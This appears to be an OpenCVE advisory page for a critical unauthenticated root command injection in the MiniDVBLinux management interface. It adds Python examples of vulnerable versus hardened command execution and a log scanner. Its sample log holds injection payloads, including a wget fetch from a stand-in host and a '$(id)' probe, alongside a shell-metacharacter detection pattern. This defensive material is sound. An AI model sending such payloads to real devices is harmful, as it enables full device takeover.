Description
An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device. Exploitation evidence was observed by the Shadowserver Foundation on 2024-04-10 UTC.
Published: 2025-06-20
Score: 9.3 Critical
EPSS: 5.3% Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An OS command injection flaw in MiniDVBLinux allows a remote, unauthenticated attacker to supply unsanitized input that is passed directly to the system shell. The flaw results in execution of arbitrary commands with root privileges, enabling full compromise of the device, including configuration changes, backdoor installation, or service disruption.
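The pattern the paragraph describes, as an added Python illustration that is not MiniDVBLinux code (the page does not name the affected handler, parameter or tool, so the `adapter` parameter and the `echo` stand-in for the real system command are assumptions): the vulnerable form splices a request parameter into a shell command line, the hardened form rejects anything outside an allowlist and passes the value as one argv element so no shell ever parses it.

```python
import re
import shlex
import subprocess

# Hypothetical parameter: a DVB adapter name submitted by the web client.
# The real MiniDVBLinux parameter and handler are not documented on this page;
# this is a generic CWE-78 illustration, not the project's own code.
ADAPTER_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def vulnerable_status(adapter: str) -> str:
    """CWE-78 pattern: untrusted input is spliced into a shell command line.

    `echo` stands in for whatever system tool the interface would call. With
    shell=True the string is handed to /bin/sh, so metacharacters in `adapter`
    (; | && ` $() and newlines) start additional commands, running with the
    privileges of the web server process (root, in the MiniDVBLinux case).
    """
    cmd = f"echo status-for {adapter}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def is_valid_adapter(adapter: str) -> bool:
    """Allowlist check: only the characters a real adapter name can contain."""
    return ADAPTER_NAME.fullmatch(adapter) is not None


def hardened_status(adapter: str) -> str:
    """Hardened form: reject anything outside the allowlist, then execute with an
    argv list so no shell is involved and the value is a single argument."""
    if not is_valid_adapter(adapter):
        raise ValueError(f"rejected adapter name: {adapter!r}")
    result = subprocess.run(["echo", "status-for", adapter],
                            capture_output=True, text=True)
    return result.stdout


def argv_only_status(adapter: str) -> str:
    """Argv form without validation. Even unvalidated, the payload stays one
    argument and is printed literally rather than executed; the allowlist is
    still wanted on top so that garbage values are rejected early."""
    result = subprocess.run(["echo", "status-for", adapter],
                            capture_output=True, text=True)
    return result.stdout


def shell_quoted_status(adapter: str) -> str:
    """If a shell really is required (pipes or redirection built by the program),
    quote each untrusted value with shlex.quote so it cannot break out."""
    cmd = f"echo status-for {shlex.quote(adapter)}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Constructed payload: the second command would be whatever the attacker wants.
    payload = "adapter0; echo INJECTED"
    print("vulnerable :", repr(vulnerable_status(payload)))
    print("argv only  :", repr(argv_only_status(payload)))
    print("quoted     :", repr(shell_quoted_status(payload)))
    try:
        hardened_status(payload)
    except ValueError as exc:
        print("hardened   :", exc)
    print("hardened ok:", repr(hardened_status("adapter0")))
```

Running it shows the vulnerable function emitting a second line (`INJECTED`) because `/bin/sh` treated `;` as a command separator, while the argv and quoted forms print the payload as literal text and the hardened form refuses the value before any process is started.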

Affected Systems

MiniDVBLinux devices running version 5.4 or earlier are affected. The vulnerability resides in the web-based management interface, so any installation whose interface is reachable by an attacker is exposed; network placement only determines who can reach it. The only vendor and product tracked for this CVE is MiniDVBLinux (cpe:2.3:a:minidvblinux:minidvblinux).

Risk and Exploitability

The flaw carries a CVSS v4.0 base score of 9.3 (NVD also recorded a CVSS v3.1 score of 9.8) and an EPSS score of 5.3 %. The vector (AV:N/AC:L/AT:N/PR:N/UI:N) indicates that the vulnerability can be exploited from any network point that can reach the management interface, with no authentication, user interaction or special preconditions. The SSVC assessment records exploitation status as 'poc', the attack as automatable and the technical impact as total. Because the vulnerability is public and exploitation evidence has been reported, the risk is significant, though the relatively low EPSS score suggests that exploitation is not yet widespread. The issue is not listed in CISA’s KEV catalog.

Generated by OpenCVE AI on June 18, 2026 at 02:35 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the device firmware to a version newer than 5.4 as soon as the vendor provides one; at the time of writing no fix or workaround is listed.
  • Restrict the web management interface to a trusted internal subnet or VPN, and block all external access unless necessary.
  • Enable logging and monitoring of shell command execution, set up alerts for unexpected root activity, and review the management interface’s web server logs for requests whose parameters carry shell metacharacters.
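One way to act on the logging recommendation, as an added example that is not OpenCVE's or the project's code: scan web access log lines for request parameters that, once URL-decoded, contain shell metacharacters. The log format is assumed to be Apache/nginx combined format, the endpoint `/cgi-bin/status.cgi` and parameter `adapter` are hypothetical (the page does not name the vulnerable endpoint), and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample log (combined log format). The endpoint, parameter names,
# addresses and timestamps are invented for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jun/2026:09:12:01 +0000] "GET /cgi-bin/status.cgi?adapter=adapter0 HTTP/1.1" 200 512
203.0.113.9 - - [18/Jun/2026:09:12:07 +0000] "GET /cgi-bin/status.cgi?adapter=adapter0%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 77
203.0.113.9 - - [18/Jun/2026:09:12:09 +0000] "GET /cgi-bin/status.cgi?adapter=%24(id) HTTP/1.1" 200 80
203.0.113.9 - - [18/Jun/2026:09:12:11 +0000] "GET /cgi-bin/status.cgi?adapter=%2524%28id%29 HTTP/1.1" 200 80
198.51.100.2 - - [18/Jun/2026:09:13:00 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 302 0
"""

# Shell constructs that have no business inside a management-interface parameter.
SHELL_INJECTION = re.compile(r"[;|`<>\n\r]|\$\(|\$\{|&&")

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (param, decoded value, matched token) for each query parameter that
    contains a shell metacharacter after decoding.

    parse_qsl already percent-decodes once; decoding a second time catches
    double-encoded payloads such as %2524 (which decodes to %24, then to $)."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)
        m = SHELL_INJECTION.search(decoded)
        if m:
            hits.append((name, decoded, m.group(0)))
    return hits


def scan_log(lines):
    """Run the check over every parseable line and collect findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value, token in suspicious_params(rec["target"]):
            findings.append({
                "ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                "param": name, "value": value, "token": token,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} status={f['status']} "
              f"param={f['param']} token={f['token']!r} value={f['value']!r}")
```

The `status` field matters when triaging: a 200 on a request carrying `;wget ...` means the interface accepted the parameter, so the device should be treated as compromised and the fetched URL pulled into the incident record. A hit on a denied or 4xx request is still worth an alert, since it shows someone probing the interface from outside the trusted subnet.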


Advisories
Source  ID  Title
EUVD  EUVD-2025-18780  An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device.
History

Mon, 22 Dec 2025 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Minidvblinux
Minidvblinux minidvblinux
CPEs cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*
Vendors & Products Minidvblinux
Minidvblinux minidvblinux
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}


Thu, 20 Nov 2025 17:30:00 +0000

Type Values Removed Values Added
Weaknesses CWE-20

Thu, 20 Nov 2025 16:30:00 +0000

Type Values Removed Values Added
Description
  Values Removed: An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device.
  Values Added: An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device. Exploitation evidence was observed by the Shadowserver Foundation on 2024-04-10 UTC.

Mon, 23 Jun 2025 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 20 Jun 2025 19:00:00 +0000

Type Values Removed Values Added
Description An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device.
Title MiniDVBLinux Root Command Injection
Weaknesses CWE-20
CWE-78
References
Metrics cvssV4_0

{'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-14T02:07:21.867Z

Reserved: 2025-01-31T18:32:36.214Z

Link: CVE-2025-25038

Vulnrichment

Updated: 2025-06-23T20:34:25.969Z

NVD

Status : Analyzed

Published: 2025-06-20T19:15:36.050

Modified: 2026-06-17T09:00:11.037

Link: CVE-2025-25038

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-18T02:45:16Z

Weaknesses
  • CWE-78

    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')